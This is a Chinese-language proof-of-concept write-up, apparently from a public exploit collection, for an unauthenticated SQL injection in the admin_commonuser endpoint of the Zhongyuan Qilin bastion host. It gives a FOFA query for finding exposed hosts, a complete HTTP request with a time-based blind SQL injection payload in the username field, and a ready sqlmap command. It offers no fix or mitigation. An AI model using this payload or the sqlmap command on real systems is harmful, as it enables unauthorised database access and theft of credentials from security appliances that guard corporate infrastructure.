POC/wpoc/中远麒麟/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md

50 lines
2.2 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# 中远麒麟堡垒机admin_commonuserSQL注入漏洞
# 一、漏洞简介
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。
# 二、影响版本
+ 中远麒麟堡垒机
# 三、资产测绘
+ fofa`cert.subject="Baolei"`
+ 登录页面
![1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d.png](./img/4GELrA0FZ4l8bMSI/1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d-959746.png)
# 四、漏洞复现
```plain
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
```
![1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c.png](./img/4GELrA0FZ4l8bMSI/1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c-177575.png)
**sqlmap**
```plain
sqlmap -u 'https://xx.xx.xx.xx/admin.php?controller=admin_commonuser' --data='username=admin' --batch
```
![1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f.png](./img/4GELrA0FZ4l8bMSI/1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f-940166.png)
> 更新: 2024-02-29 23:57:14
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/br57cs51cd4m7sr5>